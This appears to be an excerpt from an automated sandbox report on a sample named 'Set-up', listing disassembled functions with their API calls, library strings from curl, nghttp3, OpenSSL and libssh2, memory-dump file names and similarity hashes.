memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008A499C
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 008A4A0A
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 008A4A8E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 008A4AA3
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 008A4AB8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 008A4B1A

Strings

pri->inc == 0 || pri->inc == 1, xrefs: 008A4AB3
conn->server, xrefs: 008A4A89, 008A4B15
pri->urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A4A9E
nghttp3_conn.c, xrefs: 008A4A00, 008A4A84, 008A4A99, 008A4AAE, 008A4B10
!conn->server, xrefs: 008A4A05

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 3718630003-1169204258
Opcode ID: 9fd9621f14ec50ae37cbdf5a1d7f43da603ec5280b178dbfdbbb95a9b1414a73
Instruction ID: ed12cf2e951fe2882684aa46eaceb30b17a7ce372796cfbf9a739f675b364dc5
Opcode Fuzzy Hash: 9fd9621f14ec50ae37cbdf5a1d7f43da603ec5280b178dbfdbbb95a9b1414a73
Instruction Fuzzy Hash: 09513571A04305AFEB109E28DC01BAB7BE9FF87314F044529F954D25D2E7B0A994C7A2

Function 009B4580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00878C0E,?), ref: 009B45E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00878C0E,?), ref: 009B460A

Strings

dynamic, xrefs: 009B4604, 009B4633
LOAD, xrefs: 009B46BA
OPENSSL_ENGINES, xrefs: 009B461C
id=%s, xrefs: 009B475E
LIST_ADD, xrefs: 009B46A0
crypto/engine/eng_list.c, xrefs: 009B46DF, 009B4704, 009B4750
ENGINE_by_id, xrefs: 009B46D5, 009B46FA, 009B4746
/data/curl-i686/lib/engines-3, xrefs: 009B462B, 009B4682
DIR_ADD, xrefs: 009B4683
DIR_LOAD, xrefs: 009B466A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: 094bb75815b3ef98aa7991032adb0268c0e52faf6da25d54ca800b9e36eca875
Instruction ID: fbd87d17c6ed047010621f11f35562b8e8c42aeb7720b4e5b23924d820af0134
Opcode Fuzzy Hash: 094bb75815b3ef98aa7991032adb0268c0e52faf6da25d54ca800b9e36eca875
Instruction Fuzzy Hash: 5B41C675B443106BEA3076A56E43BA621EC4BA2B66F090425FE04752C3FE919D18A1B3

Function 00866810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00866884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 008668AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008668C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00866973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00866983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00866995

Strings

[, xrefs: 008669E1

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: 3ecde7ba3dfcdbaab13d5d7dc3b938cf1eeebf2e953857a545cc8ff4ee12893d
Instruction ID: caf7347ebaa7a8ce45837d83cf7c8618d1ea139bc2c9724fe5d49991f99c27b6
Opcode Fuzzy Hash: 3ecde7ba3dfcdbaab13d5d7dc3b938cf1eeebf2e953857a545cc8ff4ee12893d
Instruction Fuzzy Hash: 5CB165719083D5ABDB359A24C89173FBBD8FF55328F1A092DE8C6C6181FB25C8748392

Function 008063F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00806467

Strings

%d%02d%02d %02d:%02d:%02d, xrefs: 008066D5
hsts.c, xrefs: 0080656B, 008065CF
%s%s "%s", xrefs: 008064AA
unlimited, xrefs: 008064A1
mite, xrefs: 00806688
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00806462
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00806540

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 2dc95fa627882b52a78f6a36905b8921b0a0f1da2fee86cc928e27f26ba4bb8e
Instruction ID: 3922d3e83d0cab4d4db8ed822b6a4f73f56c99617d134482f866e310a8630ad7
Opcode Fuzzy Hash: 2dc95fa627882b52a78f6a36905b8921b0a0f1da2fee86cc928e27f26ba4bb8e
Instruction Fuzzy Hash: 8A81E5B2A04701ABEB509A24DC41B6B76E9FF94714F08462CF959C7292F731ED60C793

Function 008A6210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0087DB9C,?,008A3BB8,00000000,?,?), ref: 008A6433

Strings

chunk->end == tbuf->buf.end, xrefs: 008A649B
nghttp3_stream.c, xrefs: 008A6429, 008A6487, 008A6496, 008A64AB, 008A64C0
stream_pop_outq_entry, xrefs: 008A647D
nghttp3_ringbuf_len(chunks), xrefs: 008A64B0
chunk->begin == tbuf->buf.begin, xrefs: 008A64C5
stream->outq_idx + 1 >= npopped, xrefs: 008A642E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: 55cf8c0742e3a247d4023c2d99276217c618c2d9a1aa0676dceaba64df9bb9a4
Instruction ID: 89c408f7f614dc2a0f7d3d01a9077585558d719dcc0da50f4c86ed9d30f5b4dc
Opcode Fuzzy Hash: 55cf8c0742e3a247d4023c2d99276217c618c2d9a1aa0676dceaba64df9bb9a4
Instruction Fuzzy Hash: F6718A74A04344AFEB25DF28DC85BAEB7A1FF49300F048528F849D7691EB70E954CB52

Function 0081E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00825EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00825ED4

Part of subcall function 00844F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00844F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0081EA9B

Part of subcall function 008206F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00825663,?), ref: 008206F9

Strings

The redirect target URL could not be parsed: %s, xrefs: 0081E9E1
Switch to %s, xrefs: 0081EDA3
Clear auth, redirects to port from %u to %u, xrefs: 0081EB1B
Issue another request to this URL: '%s', xrefs: 0081ECA4
Switch from POST to GET, xrefs: 0081ED2B
Maximum (%ld) redirects followed, xrefs: 0081EC11
transfer.c, xrefs: 0081E7F2, 0081E97C, 0081EA7D, 0081EAA5, 0081EAE1, 0081EB46, 0081EB92, 0081EBA8, 0081EBCA, 0081EC43
GET, xrefs: 0081ED95
Clear auth, redirects scheme from %s to %s, xrefs: 0081EB84
HEAD, xrefs: 0081ED9A, 0081EDA2

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: fa8e2a7fe61e6f25e0061d24b8e7818d074dbd3d5d1dd3b207a94191fdf5fd15
Instruction ID: d889a7bf6745fc8d9529535173ba7d8045167cdd9120eb3f7a742ef48c7528a8
Opcode Fuzzy Hash: fa8e2a7fe61e6f25e0061d24b8e7818d074dbd3d5d1dd3b207a94191fdf5fd15
Instruction Fuzzy Hash: BEF1F5759043046BEB209F28EC86BE63B98FF50714F084475FC49EE2D7E77199948762

Function 009FA300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 009FA61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 009FA632

Part of subcall function 009FA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,009FA654,?,PRIVATE KEY), ref: 009FA0BD
Part of subcall function 009FA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 009FA0C8
Part of subcall function 009FA0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 009FA0DF

Part of subcall function 009738A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0097397E

Strings

pem_read_bio_key_decoder, xrefs: 009FA54E
PRIVATE KEY, xrefs: 009FA616, 009FA649
PEM, xrefs: 009FA3FF
crypto/pem/pem_pkey.c, xrefs: 009FA555, 009FA802, 009FA831, 009FA85C, 009FA872
PARAMETERS, xrefs: 009FA5CF
ANY PRIVATE KEY, xrefs: 009FA6B4
pem_read_bio_key_legacy, xrefs: 009FA7F8, 009FA827
PUBLIC KEY, xrefs: 009FA5D4, 009FA5F1
ENCRYPTED PRIVATE KEY, xrefs: 009FA62C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: 966a8cc70c682ab617a1016494bc154413001fc887a107064211d7df14238dd1
Instruction ID: af55e9347a39e1f185df5803cfae915f75b29efba0b9f79e0584f1c244406aa5
Opcode Fuzzy Hash: 966a8cc70c682ab617a1016494bc154413001fc887a107064211d7df14238dd1
Instruction Fuzzy Hash: B8D1D5F2E443056BE6217A60AD43F7F76EC9FD4754F044928FA4CA6183FA61E90487A3

Function 008EC290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 008EC60E

Strings

Unable to send FXP_OPEN*, xrefs: 008EC45B
Too small FXP_HANDLE, xrefs: 008EC582, 008EC675
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 008EC444
Unable to allocate new SFTP handle structure, xrefs: 008EC646
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 008EC410
Failed opening remote file, xrefs: 008EC531
Too small FXP_STATUS, xrefs: 008EC517
Timeout waiting for status message, xrefs: 008EC4FB
feWould block waiting for status message, xrefs: 008EC4A6
Response too small, xrefs: 008EC4E3

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: d6e5786b3b2c45e2bb3252e68cadcd6efb14e546f880c2071989babb68a666aa
Instruction ID: ad5925a1a8a2bf8c9ff9b5a7e98e92478d3017f87eadee7fa7d6f91cfd1e5a52
Opcode Fuzzy Hash: d6e5786b3b2c45e2bb3252e68cadcd6efb14e546f880c2071989babb68a666aa
Instruction Fuzzy Hash: 97B1F2B09047819FDB10CF29DC51A6BB7A4FF96318F044A2CF856D6292E770D919CBA2

Function 0084E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0084CC57), ref: 0084F028

Strings

[%s] -> [%s], xrefs: 0084E2E0, 0084E38E, 0084F116, 0084F203
ftp.c, xrefs: 0084F08A, 0084F0BD, 0084F13C
NLST, xrefs: 0084F05E, 0084F07A
TYPE %c, xrefs: 0084E323
STOR_PREQUOTE, xrefs: 0084F1F7
SIZE %s, xrefs: 0084E406
%s%s%s, xrefs: 0084F07B
LIST, xrefs: 0084F059, 0084F10A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: c1121f5d8f6664fac85b133d82b5036d96a0d9d92e74168d7df11485bee33309
Instruction ID: a9b73180cb5668f5ce4d3e47c0dc4f51487686ac3c31d9b7eb047e3d1f07fc91
Opcode Fuzzy Hash: c1121f5d8f6664fac85b133d82b5036d96a0d9d92e74168d7df11485bee33309
Instruction Fuzzy Hash: B8A1347170434CABE7299A589C05BB77789FB91308F08407DEA48DB283E3B6DD45C7A2

Function 008AA8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 008AA9E8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,008A71B7,00000001,?,?), ref: 008AAA04
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,008A71B7,00000001,?,?), ref: 008AAA19
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,008A71B7,00000001,?,?), ref: 008AAA2E

Strings

key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key), xrefs: 008AAA14
i < blk->n, xrefs: 008AA9FF
nghttp3_ksl.c, xrefs: 008AA9FA, 008AAA0F, 008AAA24
ksl->head, xrefs: 008AAA29

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
